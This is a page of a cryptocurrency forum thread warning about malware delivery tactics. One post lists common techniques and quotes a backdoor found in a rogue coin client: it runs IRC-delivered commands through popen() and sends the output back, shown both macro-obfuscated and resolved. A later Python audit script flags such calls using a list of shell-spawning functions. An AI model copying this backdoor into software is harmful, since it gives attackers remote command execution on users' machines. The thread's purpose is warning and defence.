Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 28. (Read 837801 times)

full member
Activity: 169
Merit: 100
I don't know if this is malware or what, but every time I copy an address and paste it where I should when I intend to send some funds, the address is changed: some characters are omitted. That's why when making transactions I used my phone instead of my PC. Does anyone experience this too? If this is a malware infection, what should I do?
newbie
Activity: 152
Merit: 0
This sounds really scary, but I guess that where there is money, there are also malversations.

Thanks for this information.
newbie
Activity: 27
Merit: 0
Thank you guys for the very useful post - especially useful for all us newbies!
newbie
Activity: 38
Merit: 0
Great post... thanks for sharing.

I will add it to the black list
newbie
Activity: 2
Merit: 0
So to my understanding... no type of anti-virus software can stop this?

Is there any new software for Windows that can prevent this?
newbie
Activity: 109
Merit: 0
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
// any PRIVMSG whose fourth word is ":!" is treated as a command request
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // the remainder of the IRC line is handed to the shell via popen()
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // extract the sender's nick from the ":nick!user@host" prefix
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // command output is sent back to whoever issued it
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Hi there, I would like to ask if it is safe to use incognito mode in Google Chrome. Or do I need to install a software application that blocks the malware? Thanks in advance.

As you said, virus scans are no longer sufficient; any advice for Android users? I'm kinda new to this.
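One way to catch the pattern quoted above during a source audit, before building a client someone posted (an added example, not code from the post or from any coin's code base): resolve simple `#define` aliases such as `CRead -> popen`, then flag every call site that expands to a process-spawning function. The sample source below is constructed to mirror the macro trick in the quoted backdoor; the alias list and function names are the example's own assumptions.

```python
import re

# Constructed sample: the same macro indirection as the quoted backdoor,
# where CRead looks harmless until the #define is followed back to popen.
SAMPLE_SOURCE = r'''
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose

void HandleIrcLine() {
    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    }
}
'''

# Functions that hand control to a shell or spawn a process (assumed audit list).
DANGEROUS = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
             "execve", "WinExec", "ShellExecuteA", "ShellExecuteW",
             "CreateProcessA", "CreateProcessW"}

# Only object-like macros that alias one identifier to another are resolved;
# "#define CBuff \"PRIVMSG\"" is a string and is deliberately not matched.
DEFINE_RE = re.compile(r'^\s*#\s*define\s+(\w+)\s+(\w+)\s*$', re.M)
CALL_RE = re.compile(r'\b(\w+)\s*\(')


def collect_aliases(source):
    """Map each macro name to its final expansion, following chains (A -> B -> popen)."""
    direct = {m.group(1): m.group(2) for m in DEFINE_RE.finditer(source)}
    resolved = {}
    for name in direct:
        seen, cur = set(), name
        while cur in direct and cur not in seen:   # stop on cycles
            seen.add(cur)
            cur = direct[cur]
        resolved[name] = cur
    return resolved


def find_shell_calls(source):
    """Return (line_no, identifier_as_written, resolved_target) for each suspicious call."""
    aliases = collect_aliases(source)
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith('#'):          # skip preprocessor lines themselves
            continue
        for m in CALL_RE.finditer(line):
            ident = m.group(1)
            target = aliases.get(ident, ident)
            if target in DANGEROUS:
                hits.append((lineno, ident, target))
    return hits
```

Run it over every `.cpp`/`.h` file of a posted source tree; a hit whose identifier differs from its target is exactly the macro-hidden case that casual inspection misses.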
newbie
Activity: 9
Merit: 0
Thank you for sharing!
newbie
Activity: 4
Merit: 0
Thanks for sharing!
member
Activity: 602
Merit: 13
Then how can people who are not IT knowledgeable, like me, detect a fake coin with a malware wallet?

Any advice?
newbie
Activity: 20
Merit: 0
Malware is a business for some people. From that perspective, we should change our mindset and do our best to protect our interests. For our part, we should increase our level of knowledge on how to fight malware.

Never forget that if you're not paying for the product, you ARE the product.
member
Activity: 505
Merit: 35
Increasing malware infection is a very unfortunate experience. But based on my experience, every one of us needs to understand why they flourish even though we secure our systems. Malware is a business for some people. From that perspective, we should change our mindset and do our best to protect our interests. For our part, we should increase our level of knowledge on how to fight malware.
member
Activity: 616
Merit: 10
Can you please explain how to protect yourself from attacks? Can I put Linux on and not survive? Or is there a threat anyway?
member
Activity: 392
Merit: 20
Thanks for the info...I hope this forum will help me to save my money from scammers. Experience unfortunately was sad already.
newbie
Activity: 84
Merit: 0
Thanks for sharing. I will be more secure from now on.
member
Activity: 117
Merit: 10
For this reason I love Bitcointalk.org. Thank you!!
newbie
Activity: 98
Merit: 0
Thanks for the info
jr. member
Activity: 644
Merit: 1
It is dangerous even to visit sites, not to mention the downloads )))
member
Activity: 294
Merit: 10
A really good topic; often people start to think about the safety of their wallets when it's too late.
member
Activity: 373
Merit: 11
CryptoRex
Thanks for the information. There are so many ways that hackers are trying to steal our money. I will post and share this information to help others in the community stay safe while trading or online.